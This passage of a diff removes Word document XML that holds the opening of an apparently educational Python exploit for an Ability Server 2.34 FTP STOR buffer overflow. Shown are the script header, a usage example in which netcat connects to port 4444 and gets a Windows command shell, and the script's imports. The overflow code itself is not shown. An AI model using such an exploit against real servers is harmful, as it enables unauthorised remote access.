-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Ability Server 2.34 FTP STOR Buffer Overflow   </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Advanced, </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>secure</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> and easy to use FTP Server. </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># 21 Oct 2004 - </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>muts</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">                                      </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># D:\BO&gt;ability-2.34-ftp-stor.py                       </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># D:\data\tools&gt;nc -v 127.0.0.1 4444               </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># localhost [127.0.0.1] 4444 (?) open               </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Microsoft Windows XP [Version 5.1.2600]        </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve"># (C) Copyright 1985-2001 Microsoft Corp.        </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># D:\Program Files\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>abilitywebserver</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">&gt;                </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">import </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftplib</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftplib</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> import FTP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">import </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>struct</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\n\n################################"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nAbility</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Server 2.34 FTP STOR buffer Overflow"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nFor</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Educational Purposes </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Only!\</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">n" </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
